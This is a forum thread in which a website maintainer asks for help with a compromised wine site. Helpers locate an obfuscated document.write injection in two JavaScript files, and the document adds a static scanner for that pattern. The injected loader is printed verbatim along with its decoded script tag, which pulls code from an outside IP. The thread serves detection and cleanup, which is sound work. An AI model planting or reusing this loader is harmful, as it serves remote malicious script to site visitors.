haakwine.com compromised

gabbafam:
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time I access one website, www.haakwine.com. I did a Yahoo search on the 94.247.2.195 and found this malware domain list and forum. I don't know if you are the right person to post a reply to, but I am really wanting to find out how to clean this off this website because I am the website updater and don't know why it is doing this. Can you offer any help whatsoever? I would be greatly indebted to you.

--- Quote from: MysteryFCM on April 07, 2009, 06:17:04 am ---I think you could be right :( ..... the following is the uncompressed output from the PDF;

--- End quote ---

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

MysteryFCM:
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Never mind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);


--- Code: ---document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
--- End code ---

This decodes to;


--- Code: ---<script src=//94.247.2.195/jquery.js></script>
--- End code ---

GmG:
There's a malware script in mm_menu.js


--- Code: ---<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->

--- End code ---

MysteryFCM:
heh yep, updated my post whilst you were posting ....

MysteryFCM:
Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js
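
The following is an added example, not part of the original thread: a static check a site maintainer could run over the text of each script file to find the `document.write(unescape(...).replace(...))` injection quoted above and decode it without executing it. The names `findInjectedLoaders`, `percentDecode`, `INJECT_RE` and `SAMPLE` are assumptions made for this example, and the sample file is constructed around the line posted in the thread.

```javascript
// Added example: static scan for the injection pattern quoted in this thread,
//   document.write(unescape('<padded %XX text>').replace(/tok|tok/g,""))
// The payload is decoded as data only; nothing is evaluated or written to a page.
const INJECT_RE =
  /document\.write\(\s*unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)\s*\.replace\(\s*\/((?:[^\/\\\n]|\\.)+)\/g\s*,\s*(['"])\4\s*\)\s*\)/g;

// Same result as unescape() for %XX and %uXXXX sequences.
function percentDecode(text) {
  return text.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

function findInjectedLoaders(source) {
  const findings = [];
  for (const m of source.matchAll(INJECT_RE)) {
    const line = source.slice(0, m.index).split("\n").length;
    const tokens = m[3].split("|");
    // Only strip padding made of plain alphanumeric tokens; never compile an
    // arbitrary pattern taken from an untrusted file.
    if (!tokens.every((t) => /^[A-Za-z0-9]+$/.test(t))) {
      findings.push({ line, decoded: null, scriptSrcs: [] }); // flag for manual review
      continue;
    }
    // Same order as the injected code: unescape first, then remove padding.
    const decoded = percentDecode(m[2]).replace(new RegExp(tokens.join("|"), "g"), "");
    const srcRe = /<script\b[^>]*\bsrc\s*=\s*["']?([^\s"'>]+)/gi;
    const scriptSrcs = [...decoded.matchAll(srcRe)].map((s) => s[1]);
    findings.push({ line, decoded, scriptSrcs });
  }
  return findings;
}

// Constructed sample file: a placeholder function followed by the line from the thread.
const SAMPLE = `function mmLoadMenus() { /* constructed placeholder for menu code */ }
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->
`;

console.log(JSON.stringify(findInjectedLoaders(SAMPLE), null, 2));
```

Pass it the text of every script the site serves, including the two files named in the thread; any finding marks a file that has been modified and should be replaced with a clean copy.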